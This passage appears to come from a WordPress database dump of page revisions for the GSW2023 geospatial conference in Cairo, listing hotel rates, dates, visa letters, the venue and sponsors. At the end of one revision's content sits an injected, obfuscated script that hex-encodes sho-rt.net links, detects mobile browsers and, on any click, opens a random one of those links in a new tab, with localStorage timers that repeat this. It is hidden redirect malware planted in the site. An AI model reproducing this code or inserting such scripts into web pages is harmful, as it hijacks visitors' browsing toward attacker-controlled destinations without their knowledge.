src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:17:29','2023-08-16 00:17:29','',3066,'https://gsw2023.com/?p=5242',0,'revision','',0),
(5243,1,'2023-08-16 00:17:57','2023-08-16 00:17:57','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter 